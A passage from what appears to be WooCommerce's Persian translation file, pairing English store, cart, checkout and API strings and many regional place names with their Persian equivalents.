Catherine','Manchester'=>'Manchester','Limit result set to variations in the specified categories.'=>'مجموعه نتایج را به تغییرات در دسته‌های مشخص شده محدود کنید.','Limit result set to variations that don\'t include the specified attributes.'=>'مجموعه نتایج را به تغییراتی که ویژگی‌های مشخص شده را شامل نمی‌شوند محدود کنید.','Limit result set to variations that include the specified attributes.'=>'مجموعه نتایج را به تغییراتی که شامل ویژگی های مشخص شده است محدود کنید.','Add additional piece of info about each variation to the report.'=>'اطلاعات بیشتری در مورد هر تغییر به گزارش اضافه کنید.','Limit result set to items that don\'t have the specified parent product(s).'=>'مجموعه نتایج را به مواردی محدود کنید که محصول(های) اصلی مشخص شده را ندارند.','Limit result set to items that have the specified parent product(s).'=>'مجموعه نتایج را به مواردی محدود کنید که دارای محصول(های) والد مشخص شده هستند.','Limit result set to variations not in the specified categories.'=>'مجموعه نتایج را به تغییراتی که در دسته‌های مشخص شده نیستند محدود کنید.','Stats about variations.'=>'آمار مربوط به متغیر‌ها.','Limit result set to items that have the specified variation(s) assigned.'=>'مجموعه نتایج را به مواردی محدود کنید که دارای متغیر(های) مشخص شده است.','Limit result set to items that don\'t have the specified variation(s) assigned.'=>'مجموعه نتایج را به مواردی محدود کنید که متغیر(های) مشخص شده را ندارند.','Variations detailed reports.'=>'گزارش‌های دقیق متغیرها.','Town / City / Post Office'=>'شهرک / شهر / اداره پست','Tags deleted.'=>'برچسب پاک شد.','Categories deleted.'=>'دسته‌ها حذف شدند.','WooCommerce Shipping'=>'حمل و نقل ووکامرس','(includes %1$s estimated for %2$s)'=>'(شامل %1$s تخمین زده شده برای %2$s)','Parish'=>'محله','Please choose product options by visiting %2$s.'=>'لطفا با بازدید از %2$s گزینه‌های محصول را انتخاب کنید.','Click here to set your new password.'=>'برای بازنشناسی گذرواژه اینجا کلیک کنید.','Whether to create a new user account as part of order processing.'=>'امکان ایجاد یک حساب کاربری جدید بعنوان بخشی از روند سفارش.','Set password'=>'تنظیم گذرواژه','The slug for the resource.'=>'نامک این مبنع.','By clicking "Get started", you agree to our %1$sTerms of Service%2$s'=>'با کلیک روی «شروع کنید»، %1$sشرایط خدمات%2$s ما را می‌پذیرید','districtVojvodina'=>'Vojvodina','districtKosovo-Metohija'=>'Kosovo-Metohija','districtKosovo-Pomoravlje'=>'Kosovo-Pomoravlje','districtKosovska Mitrovica'=>'Kosovska Mitrovica','districtPrizren'=>'Prizren','districtPeć'=>'Peć','districtKosovo'=>'Kosovo','districtZlatibor'=>'Zlatibor','districtZaječar'=>'Zaječar','districtWest Bačka'=>'West Bačka','districtToplica'=>'Toplica','This password reset key is for a different user account. Please log out and try again.'=>'این کلید بازنشانی گذرواژه برای حساب کاربری دیگری است. لطفا خارج شده و دوباره امتحان کنید.','districtŠumadija'=>'Šumadija','Meta value for UI display.'=>'مقدار متا برای نمایش UI.','Parent product name if the product is a variation.'=>'نام محصول والد اگر این محصول یک متغیر باشد.','Meta key for UI display.'=>'کلید متا برای نمایش UI.','districtMačva'=>'Mačva','districtKolubara'=>'Kolubara','districtJablanica'=>'Jablanica','districtDanube'=>'Danube','districtCentral Banat'=>'Central Banat','districtBraničevo'=>'Braničevo','districtBor'=>'Bor','districtBelgrade'=>'Belgrade','districtSrem'=>'Srem','districtSouth Banat'=>'South Banat','districtSouth Bačka'=>'South Bačka','districtRaška'=>'Raška','districtRasina'=>'Rasina','districtPomoravlje'=>'Pomoravlje','districtPirot'=>'Pirot','districtPčinja'=>'Pčinja','districtNorth Banat'=>'North Banat','districtNorth Bačka'=>'North Bačka','districtNišava'=>'Nišava','districtMorava'=>'Morava','Let\'s go'=>'بزن بریم','Abort'=>'صرف نظر','Setup Wizard'=>'استاد راه اندازی','Export ID.'=>'برون‌بری شناسه.','Export status.'=>'برون‌بری وضعیت.','Limit result set to orders that don\'t include products with the specified attributes.'=>'نتیجه برای سفارشاتی که شامل محصولی با ویژگی های مشخص شده نیستند، محدود شود.','Limit result set to orders that include products with the specified attributes.'=>'نتیجه برای سفارشاتی که شامل محصولی با ویژگی های مشخص شده هستند، محدود شود.','Export status message.'=>'صدور پیام وضعیت.','Search by similar product name, sku, or attribute value.'=>'جستجو بر اساس نام محصول مشابه، شناسه، یا مقدار ویژگی.','Please provide an array of IDs through the noteIds param.'=>'لطفا آرایه ای از شناسه ها را از طریق پارامتر noteIds ارائه دهید.','Online courses are a great solution for any business that can teach a new skill. Since courses don’t require physical product development or shipping, they’re affordable, fast to create, and can generate passive income for years to come. In this article, we provide you more information about selling courses using WooCommerce.'=>'دوره های آنلاین یک راه حل عالی برای هر شغلی است که می تواند مهارت جدیدی را آموزش دهد. از آنجا که دوره ها به توسعه یا ارسال کالای فیزیکی نیاز ندارند، ایجاد آنها سریع است و می توانند برای سالهای آینده درآمد منفعل داشته باشند. در این مقاله، ما اطلاعات بیشتری در مورد فروش دوره های آموزشی با استفاده از ووکامرس به شما ارائه می دهیم.','Do you want to sell online courses?'=>'آیا می‌خواهید دوره‌های آنلاین بفروشید؟','Monitor your sales and high performing products with the Woo app.'=>'فروش و محصولات با عملکرد بالا را با Woo app کنترل کنید.','Track your store performance on mobile'=>'عملکرد فروشگاه خود را از طریق تلفن همراه پیگیری کنید','Edit products on the move'=>'ویرایش محصولات درحال انتقال','Edit and create new products from your mobile devices with the Woo app'=>'ویرایش و ایجاد محصولات جدید از طریق دستگاه موبایل خود با نرم افزار وو','Csongrád-Csanád'=>'Csongrád-Csanád','Biscay'=>'Biscay','New Valley'=>'New Valley','Suez'=>'Suez','North Sinai'=>'North Sinai','Al Sharqia'=>'Al Sharqia','Sohag'=>'Sohag','Port Said'=>'Port Said','Matrouh'=>'Matrouh','Monufia'=>'Monufia','Cairo'=>'Cairo','Beni Suef'=>'Beni Suef','Beheira'=>'Beheira','Red Sea'=>'Red Sea','Asyut'=>'Asyut','Aswan'=>'Aswan','Alexandria'=>'Alexandria','Zou'=>'Zou','Ouémé'=>'Ouémé','Mono'=>'Mono','Littoral'=>'Littoral','Donga'=>'Donga','Kouffo'=>'Kouffo','Collines'=>'Collines','Borgou'=>'Borgou','Dakahlia'=>'Dakahlia','Atlantique'=>'Atlantique','Atakora'=>'Atakora','Alibori'=>'Alibori','Minya'=>'Minya','Luxor'=>'Luxor','Qena'=>'Qena','Kafr el-Sheikh'=>'Kafr el-Sheikh','Qalyubia'=>'Qalyubia','South Sinai'=>'South Sinai','Ismailia'=>'Ismailia','Giza'=>'Giza','Gharbia'=>'Gharbia','Faiyum'=>'Faiyum','Damietta'=>'Damietta','Onboarding is maintained in WooCommerce Admin.'=>'آماده‌سازی در ادمین ووکامرس نگهداری می‌شود.','Nevşehir'=>'Nevşehir','Muş'=>'Muş','Muğla'=>'Muğla','Kahramanmaraş'=>'Kahramanmaraş','Kütahya'=>'Kütahya','Kırşehir'=>'Kırşehir','Kırklareli'=>'Kırklareli','İzmir'=>'İzmir','İstanbul'=>'İstanbul','İçel'=>'İçel','Gümüşhane'=>'Gümüşhane','Eskişehir'=>'Eskişehir','Elazığ'=>'Elazığ','Åland Islands'=>'Åland Islands','Düzce'=>'Düzce','Karabük'=>'Karabük','Iğdır'=>'Iğdır','Bartın'=>'Bartın','Şırnak'=>'Şırnak','Kırıkkale'=>'Kırıkkale','Uşak'=>'Uşak','Şanlıurfa'=>'Şanlıurfa','Tekirdağ'=>'Tekirdağ','Niğde'=>'Niğde','Diyarbakır'=>'Diyarbakır','Çorum'=>'Çorum','Çankırı'=>'Çankırı','Çanakkale'=>'Çanakkale','Bingöl'=>'Bingöl','Balıkesir'=>'Balıkesir','Aydın'=>'Aydın','Ağrı'=>'Ağrı','Adıyaman'=>'Adıyaman','Iași'=>'Iași','Dâmbovița'=>'Dâmbovița','Caazapá'=>'Caazapá','Caaguazú'=>'Caaguazú','Guairá'=>'Guairá','Concepción'=>'Concepción','Itapúa'=>'Itapúa','Boquerón'=>'Boquerón','Canindeyú'=>'Canindeyú','Ñeembucú'=>'Ñeembucú','Alto Paraná'=>'Alto Paraná','Paraguarí'=>'Paraguarí','Asunción'=>'Asunción','San Martín'=>'San Martín','Junín'=>'Junín','Huánuco'=>'Huánuco','Apurímac'=>'Apurímac','Hawke’s Bay'=>'Hawke’s Bay','Estado de México'=>'Estado de México','Ciudad de México'=>'Ciudad de México','Telenești'=>'Telenești','Ștefan Vodă'=>'Ștefan Vodă','Șoldănești'=>'Șoldănești','Chișinău'=>'Chișinău','Málaga'=>'Málaga','León'=>'León','Jaén'=>'Jaén','Castellón'=>'Castellón','Cádiz'=>'Cádiz','Cáceres'=>'Cáceres','Ávila'=>'Ávila','Almería'=>'Almería','Araba/Álava'=>'Araba/Álava','A Coruña'=>'A Coruña','Ghardaïa'=>'Ghardaïa','Aïn Témouchent'=>'Aïn Témouchent','Aïn Defla'=>'Aïn Defla','Boumerdès'=>'Boumerdès','Strășeni'=>'Strășeni','Sîngerei'=>'Sîngerei','Rîșcani'=>'Rîșcani','Ocnița'=>'Ocnița','Hîncești'=>'Hîncești','UTA Găgăuzia'=>'UTA Găgăuzia','Florești'=>'Florești','Fălești'=>'Fălești','Edineț'=>'Edineț','Dubăsari'=>'Dubăsari','Dondușeni'=>'Dondușeni','Cimișlia'=>'Cimișlia','Căușeni'=>'Căușeni','Călărași'=>'Călărași','Bălți'=>'Bălți','Bordj Bou Arréridj'=>'Bordj Bou Arréridj','Shaanxi / 陕西'=>'Shaanxi / 陕西','Guizhou / 贵州'=>'Guizhou / 贵州','Sichuan / 四川'=>'Sichuan / 四川','Chongqing / 重庆'=>'Chongqing / 重庆','Hainan / 海南'=>'Hainan / 海南','Guangxi Zhuang / 广西壮族'=>'Guangxi Zhuang / 广西壮族','Gansu / 甘肃'=>'Gansu / 甘肃','Sidi Bel Abbès'=>'Sidi Bel Abbès','Saïda'=>'Saïda','Sétif'=>'Sétif','Tébessa'=>'Tébessa','Béchar'=>'Béchar','Béjaïa'=>'Béjaïa','Xinjiang / 新疆'=>'Xinjiang / 新疆','Tibet / 西藏'=>'Tibet / 西藏','Macao / 澳门'=>'Macao / 澳门','Ningxia Hui / 宁夏'=>'Ningxia Hui / 宁夏','Qinghai / 青海'=>'Qinghai / 青海','M’Sila'=>'M’Sila','Médéa'=>'Médéa','Guangdong / 广东'=>'Guangdong / 广东','Hunan / 湖南'=>'Hunan / 湖南','Hubei / 湖北'=>'Hubei / 湖北','Henan / 河南'=>'Henan / 河南','Shandong / 山东'=>'Shandong / 山东','Jiangxi / 江西'=>'Jiangxi / 江西','Fujian / 福建'=>'Fujian / 福建','Anhui / 安徽'=>'Anhui / 安徽','Zhejiang / 浙江'=>'Zhejiang / 浙江','Jiangsu / 江苏'=>'Jiangsu / 江苏','Shanghai / 上海'=>'Shanghai / 上海','Heilongjiang / 黑龙江'=>'Heilongjiang / 黑龙江','Jilin / 吉林'=>'Jilin / 吉林','Liaoning / 辽宁'=>'Liaoning / 辽宁','Inner Mongolia / 內蒙古'=>'Inner Mongolia / 內蒙古','Rondônia'=>'Rondônia','Piauí'=>'Piauí','Paraná'=>'Paraná','Paraíba'=>'Paraíba','Pará'=>'Pará','Maranhão'=>'Maranhão','Goiás'=>'Goiás','Espírito Santo'=>'Espírito Santo','Ceará'=>'Ceará','Amapá'=>'Amapá','Tucumán'=>'Tucumán','Río Negro'=>'Río Negro','Neuquén'=>'Neuquén','Entre Ríos'=>'Entre Ríos','Córdoba'=>'Córdoba','Shanxi / 山西'=>'Shanxi / 山西','Hebei / 河北'=>'Hebei / 河北','Tianjin / 天津'=>'Tianjin / 天津','Beijing / 北京'=>'Beijing / 北京','Yunnan / 云南'=>'Yunnan / 云南','Zürich'=>'Zürich','Neuchâtel'=>'Neuchâtel','Graubünden'=>'Graubünden','São Paulo'=>'São Paulo','Ciudad Autónoma de Buenos Aires'=>'Ciudad Autónoma de Buenos Aires','WooCommerce Product Elements'=>'عناصر محصول ووکامرس','Paid'=>'پرداخت‌شده','Net Payment'=>'پرداخت خالص','File uploaded: %s'=>'فایل آپلود شده: %s','%1$s via %2$s'=>'%1$s از طریق %2$s','Are you sure you want to run this tool?'=>'آیا مطمئن هستید که می‌خواهید این ابزار را اجرا کنید؟','Zambezi'=>'Zambezi','Otjozondjupa'=>'Otjozondjupa','Oshikoto'=>'Oshikoto','Oshana'=>'Oshana','Omusati'=>'Omusati','Omaheke'=>'Omaheke','Ohangwena'=>'Ohangwena','Kunene'=>'Kunene','Khomas'=>'Khomas','Kavango West'=>'Kavango West','South Aegean'=>'South Aegean','North Aegean'=>'North Aegean','Ionian Islands'=>'Ionian Islands','Annaba'=>'Annaba','Skikda'=>'Skikda','Central Macedonia'=>'Central Macedonia','East Macedonia and Thrace'=>'East Macedonia and Thrace','Attica'=>'Attica','Relizane'=>'Relizane','Naama'=>'Naama','Mila'=>'Mila','Souk Ahras'=>'Souk Ahras','Tissemsilt'=>'Tissemsilt','El Bayadh'=>'El Bayadh','Oran'=>'Oran','Mostaganem'=>'Mostaganem','Constantine'=>'Constantine','Guelma'=>'Guelma','This will change the stock status of all variations.'=>'این وضعیت موجودی را برای همه تغییرات تغییر می‌دهد.','Kavango East'=>'Kavango East','Karas'=>'Karas','Hardap'=>'Hardap','Erongo'=>'Erongo','Crete'=>'Crete','Peloponnese'=>'Peloponnese','Central Greece'=>'Central Greece','West Greece'=>'West Greece','Thessaly'=>'Thessaly','Epirus'=>'Epirus','West Macedonia'=>'West Macedonia','Tipasa'=>'Tipasa','Khenchela'=>'Khenchela','El Oued'=>'El Oued','Tindouf'=>'Tindouf','El Tarf'=>'El Tarf','Illizi'=>'Illizi','Ouargla'=>'Ouargla','Mascara'=>'Mascara','Jijel'=>'Jijel','Djelfa'=>'Djelfa','Algiers'=>'Algiers','Tizi Ouzou'=>'Tizi Ouzou','Tiaret'=>'Tiaret','Tlemcen'=>'Tlemcen','Tamanghasset'=>'Tamanghasset','Bouira'=>'Bouira','Blida'=>'Blida','Biskra'=>'Biskra','Batna'=>'Batna','Oum El Bouaghi'=>'Oum El Bouaghi','Laghouat'=>'Laghouat','Chlef'=>'Chlef','Adrar'=>'Adrar','Tag not updated.'=>'برچسب به‌روز نشد.','Tag not added.'=>'برچسب افزوده نشد.','taxonomy term messages%s not added'=>'%s افزوده نشد','taxonomy term messages%s updated'=>'%s به‌روز شد','taxonomy term messages%s deleted'=>'%s حذف شد','taxonomy term messages%s added'=>'%s افزوده شد','Tag updated.'=>'برچسب بروز شد.','Category updated.'=>'دسته بروز شد.','Category not added.'=>'دسته افزوده نـشد.','Category deleted.'=>'دسته پاک شد.','Category added.'=>'دسته افزوده شد.','taxonomy term messages%s not updated'=>'%s بروزرسانی نشد','Taxonomy nameProduct type'=>'نوع محصول','Tag deleted.'=>'برچسب پاک شد.','Tag added.'=>'برچسب افزوده شد.','The assigned attribute.'=>'ویژگی اختصاص داده شده.','The term slug.'=>'نامک رده.','The term name.'=>'نام رده.','List of assigned attribute terms.'=>'لیست رده های ویژگی اختصاص داده شده.','The attribute taxonomy, or null if the attribute is not taxonomy based.'=>'طبقه بندی ویژگی، یا null اگر صفت براساس طبقه بندی نباشد است.','The attribute name.'=>'نام ویژگی.','The attribute ID, or 0 if the attribute is not taxonomy based.'=>'شناسه ویژگی، یا 0 اگر ویژگی بر اساس طبقه بندی نباشد.','The term ID, or 0 if the attribute is not a global attribute.'=>'شناسه رده یا 0 اگر این ویژگی یک ویژگی عمومی نباشد.','Taxonomy nameProduct visibility'=>'نمایانی محصول','Community support'=>'پشتیبانی انجمن','Visit community forums'=>'بازدید فروم پشتیبانی','Category not updated.'=>'دسته بروزرسانی نشد.','Instance ID.'=>'شناسه نمونه.','An account is already registered with your email address. Please log in.'=>'در حال حاضر یک حساب کاربری ثبت شده با نشانی ایمیل شما وجود دارد. لطفا وارد شوید.','The attribute taxonomy name.'=>'نام ویژگی طبقه بندی.','Taxes applied to this shipping rate using the smallest unit of the currency.'=>'مالیات بر این نرخ حمل و نقل با استفاده از کوچکترین واحد پول اعمال می شود.','True if the product is on backorder.'=>'درست است اگر محصول در صورت سفارش مجدد باشد.','Is the product stock backordered? This will also return false if backorder notifications are turned off.'=>'آیا موجودی محصول دارای سفارش مجدد است؟ اگر اعلان‌های سفارش پشتیبان خاموش شوند، این گزینه false را نیز برمی‌گرداند.','Does the product have additional options before it can be added to the cart?'=>'آیا محصول قبل از اضافه شدن به سبد خرید گزینه های اضافی دارد؟','List of variation attributes.'=>'لیست ویژگی های متغیر.','True if this attribute is used by product variations.'=>'True اگر این ویژگی توسط متغیرهای محصول استفاده شود.','The ID for the resource.'=>'شناسه برای منبع.','Add to cart URL.'=>'نشانی افزودن به سبد خرید.','Tag name'=>'نام برچسب','Tag ID'=>'شناسه برچسب','Category link'=>'لینک دسته','Category slug'=>'نامک دسته','Category name'=>'نام دسته','Category ID'=>'شناسه دسته','Tag link.'=>'پیوند برچسب.','Tag slug'=>'نامک برچسب','List of tags, if applicable.'=>'لیستی از برچسب‌ها، اگر قابل اعمال باشند.','List of categories, if applicable.'=>'لیستی از دسته‌ها، اگر قابل اعمال باشند.','Education and learning'=>'آموزش و یادگیری','Bundles'=>'بسته‌ها','Total distinct customers.'=>'کل مشتریان متمایز.','Customizable products'=>'محصولات قابل سفارشی‌سازی','Clear analytics cache'=>'پاکسازی کش آنالیز','Analytics cache cleared.'=>'کش تجزیه و تحلیل‌ها پاکسازی شد.','Whether or not the profile was skipped.'=>'اینکه آیا نمایه نادیده گرفته شده است یا خیر.','With our blocks, you can select and display products, categories, filters, and more virtually anywhere on your site — no need to use shortcodes or edit lines of code. Learn more about how to use each one of them.'=>'با بلوک‌های ما، می‌توانید محصولات، دسته‌ها، فیلترها و موارد دیگر را به صورت مجازی در هر نقطه از سایت خود انتخاب و نمایش دهید – بدون نیاز به استفاده از کدهای کوتاه یا ویرایش خطوط کد. در مورد نحوه استفاده از هر یک از آنها بیشتر بدانید.','Ready to launch your store?'=>'آماده اجرای فروشگاه هستید؟','Customize your online store with WooCommerce blocks'=>'فروشگاه آنلاین خود را با بلوک‌های ووکامرس سفارشی‌سازی کنید','To make sure you never get that sinking "what did I forget" feeling, we\'ve put together the essential pre-launch checklist.'=>'برای اطمینان از اینکه هرگز آن احساس غرق شدن "چه فراموش کردم" را ندارید، چک لیست ضروری قبل از راه اندازی را گردآوری کرده ایم.','From your account dashboard you can view your recent orders, manage your billing address, and edit your password and account details.'=>'از پیشخوان حساب‌کاربری خود می‌توانید سفارش‌های اخیر خود را مشاهده کنید، آدرس صورت‌حساب خود را مدیریت کنید، و رمز عبور و جزئیات حساب خود را ویرایش کنید.','Set up additional payment options'=>'گزینه‌های پرداخت اضافی را تنظیم کنید','Invalid admin note'=>'یادداشت نامعتبر ادمین','Browse store'=>'مشاهده فروشگاه','Details'=>'جزئیات','Remove item'=>'حذف آیتم','New in store'=>'تازه در فروشگاه','Quantity of %s in your cart.'=>'%s در سبد خرید شماست.','Your cart is currently empty!'=>'سبد خریدتان در حال حاضر خالی است!','Phone (optional)'=>'شماره تماس (اختیاری)','Order summary'=>'خلاصۀ سفارش','Payment Method'=>'روش پرداخت','Variation options'=>'گزینه‌های تنوع','Discounted price:'=>'قیمت تخفیف خورده:','Company (optional)'=>'نام شرکت (اختیاری)','Last name (optional)'=>'نام خانوادگی (اختیاری)','First name (optional)'=>'نام (اختیاری)','Postal code (optional)'=>'کد پستی (اختیاری)','State/County (optional)'=>'ایالت/شهرستان (اختیاری)','City (optional)'=>'شهر (اختیاری)','Country/Region (optional)'=>'کشور/منطقه (اختیاری)','Country/Region'=>'کشور / منطقه','Apartment, suite, etc. (optional)'=>'آپارتمان، واحد و غیره (اختیاری)','Address (optional)'=>'آدرس (اختیاری)','%d left in stock'=>'%d عدد در انبار باقی مانده است','Previous price:'=>'قیمت پیشین:','Add store details'=>'افزودن جزئیات فروشگاه','2 minutes'=>'۲ دقیقه','4 minutes'=>'۴ دقیقه','1 minute'=>'۱ دقیقه','Store details'=>'جزئیات فروشگاه','1 minute per product'=>'هر محصول 1 دقیقه','Order statusDraft'=>'پیش‌نویس','Line total tax.'=>'مجموع مالیات.','Undo'=>'بازگردانی','True if this is the rate currently selected by the customer for the cart.'=>'درست است اگر این نرخی باشد که در حال حاضر توسط مشتری برای سبد خرید انتخاب شده است.','Meta data attached to the shipping rate.'=>'داده های متا به نرخ حمل و نقل پیوست شده است.','Instance ID of the shipping method that provided the rate.'=>'شناسه نمونه روش حمل و نقل که نرخ را ارائه کرده است.','Line total (the price of the product after coupon discounts have been applied).'=>'خط کل (قیمت محصول بعد از تخفیف کوپن اعمال شده است).','Item total amounts provided using the smallest unit of the currency.'=>'مجموع اقلام با استفاده از کوچکترین واحد پول ارائه شده است.','Raw unrounded product prices used in calculations. Provided using a higher unit of precision than the currency.'=>'قیمت‌های خام بدون گرد در محاسبات استفاده می‌شود. ارائه شده با استفاده از واحد دقت بالاتر از واحد پول.','Price data for the product in the current line item, including or excluding taxes based on the "display prices during cart and checkout" setting. Provided using the smallest unit of the currency.'=>'داده‌های قیمت محصول در خط فعلی، شامل یا بدون احتساب مالیات بر اساس تنظیم «نمایش قیمت‌ها در حین سبد خرید و تسویه‌حساب». با استفاده از کوچکترین واحد پول ارائه می شود.','If true, only one item of this product is allowed for purchase in a single order.'=>'در صورت صحت، تنها یک مورد از این محصول در یک سفارش مجاز به خرید است.','True if backorders are allowed past stock availability.'=>'درست است اگر سفارشات پشتیبان در دسترس بودن سهام گذشته مجاز باشد.','Line subtotal (the price of the product before coupon discounts have been applied).'=>'سطر جمع جزء (قیمت محصول قبل از تخفیف کوپن اعمال شده است).','Line subtotal tax.'=>'سطر جمع جزء مالیات.','Word count type. Do not translate!words'=>'کلمات','Decimal precision of the returned prices.'=>'دقت اعشاری قیمت های برگشتی.','Error code'=>'کد خطا','Error message'=>'پیام خطا','List of applied cart coupons.'=>'لیست کدهای تخفیف اعمال شده.','The name of the tax.'=>'نام مالیات.','Name of the item.'=>'نام مورد.','Name of the package.'=>'نام بسته.','Description of the shipping rate, e.g. Dispatched via USPS.'=>'شرح روش حمل‌ونقل، به عنوان مثال از طریق خدمات پستی ایالات متحده آمریکا ارسال می‌شود.','ID of the shipping rate.'=>'شناسه شیوه حمل‌و‌نقل.','The ID of the payment method being used to process the payment.'=>'شناسه (ID) روش پرداختی که برای پردازش پرداخت استفاده می شود.','State/County code, or name of the state, county, province, or district.'=>'کد ایالت / شهرستان ، یا نام ایالت ، شهرستان ، استان یا منطقه.','Total amounts provided using the smallest unit of the currency.'=>'کل مبالغ ارائه شده با استفاده از کوچکترین واحد پول.','Status of the payment returned by the gateway. One of success, pending, failure, error.'=>'وضعیت پرداختی که توسط دروازه برگشت داده شده است. یکی از موفقیت ها، در انتظار، شکست، خطا.','Current set shipping address for the customer.'=>'نشانی ارسال فعلی تنظیم شده برای مشتری.','Name of the shipping rate, e.g. Express shipping.'=>'نام شیوه حمل‌ونقل، به عنوان مثال حمل‌ونقل سریع.','Delivery time estimate text, e.g. 3-5 business days.'=>'متن تخمین زمان تحویل، به عنوان مثال 3-5 روز کاری.','List of cart item errors, for example, items in the cart which are out of stock.'=>'لیست خطاهای مورد سبد خرید، به عنوان مثال، موارد موجود در سبد خرید که موجودی ندارند.','List of shipping rates.'=>'فهرست شیوه‌های حمل‌و‌نقل.','List of available shipping rates for the cart.'=>'فهرست شیوه‌های حمل‌و‌نقل در دستری برای سبد خرید.','Total tax removed due to discount applied by this coupon.'=>'کل مالیات به دلیل تخفیف اعمال شده توسط این کدحذف شد.','Total discount applied by this coupon.'=>'تخفیف کل اعمال شده توسط این کدتخفیف.','Total discount from applied coupons.'=>'مجموع تخفیف از کوپن‌های اعمال شده.','Total tax applied to items and shipping.'=>'کل مالیات اعمال شده برای اقلام و حمل و نقل.','A URL to redirect the customer after checkout. This could be, for example, a link to the payment processors website.'=>'یک URL برای تغییر مسیر مشتری پس از پرداخت. به عنوان مثال، این می تواند پیوندی به وب سایت پردازشگرهای پرداخت باشد.','An array of data being returned from the payment gateway.'=>'آرایه ای از داده ها از درگاه پرداخت بازگردانده می شود.','Decimal separator for the currency which can be used to format returned prices.'=>'جداکنندۀ اعشاری برای واحد پول که می‌تواند برای قالب‌بندی قیمت‌ها استفاده شود.','Currency minor unit (number of digits after the decimal separator) for returned prices.'=>'واحد کوچک واحد پولی (تعداد ارقام بعد از اعشار) برای قیمت‌ها.','Currency symbol for the currency which can be used to format returned prices.'=>'نماد ارز برای واحد پولی که می‌تواند برای قالب‌بندی قیمت‌ها استفاده شود.','Min and max prices found in collection of products, provided using the smallest unit of the currency.'=>'حداقل و حداکثر قیمت موجود در مجموعه محصولات با استفاده از کوچکترین واحد ارز ارائه شده است.','Number of reviews for products in this category.'=>'تعداد نظرات برای محصولات در این دسته.','Returns number of products within attribute terms.'=>'تعداد محصولات را در شرایط مشخصه برمی‌گرداند.','Country/Region code in ISO 3166-1 alpha-2 format.'=>'کد کشور/منطقه در قالب ISO 3166-1 alpha-2.','Price prefix for the currency which can be used to format returned prices.'=>'پیشوند قیمت برای ارز که می تواند برای قالب بندی قیمت های برگشتی استفاده شود.','Thousand separator for the currency which can be used to format returned prices.'=>'جداکننده هزار برای ارز که می تواند برای قالب بندی قیمت های برگشتی استفاده شود.','Currency code (in ISO format) for returned prices.'=>'کد ارز (در فرمت ISO) برای قیمت های برگشتی.','ID of the shipping method that provided the rate.'=>'شناسه روش حمل و نقل که نرخ را ارائه کرده است.','Price of this shipping rate using the smallest unit of the currency.'=>'قیمت این نرخ حمل و نقل با استفاده از کوچکترین واحد ارز.','Quantity of the item in the current package.'=>'تعداد کالا در بسته فعلی.','List of cart items the returned shipping rates apply to.'=>'لیست اقلام سبد خرید که نرخ حمل و نقل برگشتی برای آنها اعمال می شود.','The ID of the package the shipping rates belong to.'=>'شناسه بسته ای که نرخ حمل و نقل به آن تعلق دارد.','Lines of taxes applied to items and shipping.'=>'خطوط مالیات اعمال شده برای اقلام و حمل و نقل.','Total price the customer will pay.'=>'کل قیمتی که مشتری پرداخت خواهد کرد.','Total tax removed due to discount from applied coupons.'=>'کل مالیات به دلیل تخفیف از کوپن های اعمال شده حذف شد.','Cart total amounts provided using the smallest unit of the currency.'=>'کل مبالغ سبد خرید با استفاده از کوچکترین واحد ارز ارائه شده است.','True if the cart needs payment. False for carts with only free products and no shipping costs.'=>'درست است اگر سبد خرید نیاز به پرداخت داشته باشد. برای سبدهایی که فقط محصولات رایگان و بدون هزینه ارسال دارند، نادرست است.','%1$s requires an instance of %2$s or %3$s for the address'=>'%1$s به یک نمونه %2$s یا %3$s برای آدرس نیاز دارد','Shipping destination address.'=>'آدرس مقصد حمل و نقل.','The amount of tax charged.'=>'مقدار مالیات اخذ شده.','Total price of shipping.'=>'مجموع هزینه ارسال.','Total tax on fees.'=>'کل مالیات بر هزینه ها.','Total price of any applied fees.'=>'قیمت کل هر هزینه اعمال شده.','Total tax on items in the cart.'=>'مالیات کل اقلام موجود در سبد خرید.','Total price of items in the cart.'=>'قیمت کل اقلام موجود در سبد خرید.','Category image.'=>'تصویر دسته.','Apartment, suite, etc.'=>'آپارتمان ، سوئیت و غیره.','The coupons unique code.'=>'کد یکتای کدهای تخفیف.','Result of payment processing, or null if not yet processed.'=>'نتیجه پردازش پرداخت، یا اگر هنوز پردازش نشده باشد، تهی است.','Invalid coupon code.'=>'کد تخفیف معتبر نیست.','Coupons are disabled.'=>'کدهای تخفیف غیرفعال هستند.','Sort by term property.'=>'ترتیب براساس شرایط ویژگی.','City of the address being shipped to.'=>'شهر آدرسی که به آن ارسال می شود.','The order ID to process during checkout.'=>'شناسه سفارش (ID) برای پردازش در هنگام پرداخت.','Unique identifier (key) for the cart item.'=>'شناسه (کلید) منحصر به فرد برای کالای خرید.','Method not implemented'=>'روش اجرا نشده است','No payment method provided.'=>'روش پرداختی ارائه نشده است.','Limit result set to reviews from specific category IDs.'=>'تنظیم نتیجه برای بررسی از شناسه های دسته خاص.','Limit result set to reviews from specific product IDs.'=>'تنظیم نتیجه برای بررسی از شناسه محصول خاص.','Zip or Postcode of the address being shipped to.'=>'کد پستی آدرسی که به آن ارسال می شود.','ISO code for the country of the address being shipped to.'=>'کد ISO برای کشوری که در آن آدرس ارسال می شود.','Order key used to check validity or protect access to certain order data.'=>'کلید سفارش برای بررسی اعتبار یا محافظت از دسترسی به داده های خاص سفارش استفاده می شود.','Note added to the order by the customer during checkout.'=>'یادداشت توسط مشتری در هنگام پرداخت به سفارش اضافه شده است.','Order status. Payment providers will update this value after payment.'=>'وضعیت سفارش. ارائه دهندگان پرداخت پس از پرداخت این مقدار را به روز می کنند.','Cannot create order from empty cart.'=>'نمی توان از سبد خرید خالی سفارش ایجاد کرد.','Sort ascending or descending.'=>'مرتب سازی صعودی یا نزولی.','Cart item is invalid.'=>'مورد سبد خرید نامعتبر است.','New quantity of the item in the cart.'=>'مقدار جدیدی از کالای موجود در سبد خرید.','Coupon code "%s" has already been applied.'=>'کدتخفیف «%s» قبلاً اعمال شده است.','"%s" is an invalid coupon code.'=>'کدتخفیف «%s» نامعتبر است.','Coupon cannot be removed because it is not already applied to the cart.'=>'امکان حذف کدتخفیف وجود ندارد زیرا قبلاً روی سبد خرید اعمال نشده است.','The %s payment gateway is not available.'=>'درگاه پرداخت %s موجود نیست.','The chosen rate ID for the package.'=>'شناسه نرخ انتخاب شده برای بسته.','Invalid payment result received from payment method.'=>'نتیجه پرداخت نامعتبر از روش پرداخت دریافت شد.','Data to pass through to the payment method when processing payment.'=>'داده‌هایی که باید هنگام پردازش پرداخت به روش پرداخت منتقل شوند.','Cart item no longer exists or is invalid.'=>'مورد سبد خرید دیگر وجود ندارد یا نامعتبر است.','If true, empty terms will not be returned.'=>'اگر درست باشد، عبارات خالی برگردانده نمی 